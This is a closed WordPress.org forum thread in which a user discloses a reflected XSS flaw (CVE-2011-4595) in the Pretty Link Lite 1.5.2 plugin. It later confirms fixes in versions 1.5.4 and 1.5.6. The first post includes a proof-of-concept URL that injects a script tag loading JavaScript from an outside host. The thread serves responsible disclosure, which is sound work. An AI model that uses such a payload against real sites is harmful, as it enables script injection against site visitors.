WordPress.org

Ready to get started?Download WordPress

Forums

Pretty Link Lite
[resolved] 1.5.2 XSS vulnerability (5 posts)

  1. henrisalo
    Member
    Posted 2 years ago #

    There is a report of XSS-vulnerability in this WordPress-plugin: http://seclists.org/bugtraq/2011/Dec/26 which I have now tested and it seems to be valid:

    wp-content/plugins/pretty-link/pretty-bar.php?url="><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

    If this PHP-file is not meant to be called and executed by users one should add prohibitive line to the PHP-file. There is plenty of examples in other modules or I can give you one. If this is please ensure proper user input validation.

    https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

    I tested with WordPress version 3.2.1 and plugin version 1.5.2. Please contact me if you need any help!

    http://wordpress.org/extend/plugins/pretty-link/

  2. henrisalo
    Member
    Posted 2 years ago #

    CVE-2011-4595 has been assigned to this issue.

  3. henrisalo
    Member
    Posted 2 years ago #

    This seem to be fixed in 1.5.4. I verified.

  4. wpsecuritylock
    Member
    Posted 2 years ago #

    Great info! Thanks for the information.

  5. henrisalo
    Member
    Posted 2 years ago #

    This is now fixed in the version 1.5.6. Could plugin owner add CVE-2011-4595 to the changelog, thank you.

Topic Closed

This topic has been closed to new replies.

About this Plugin

About this Topic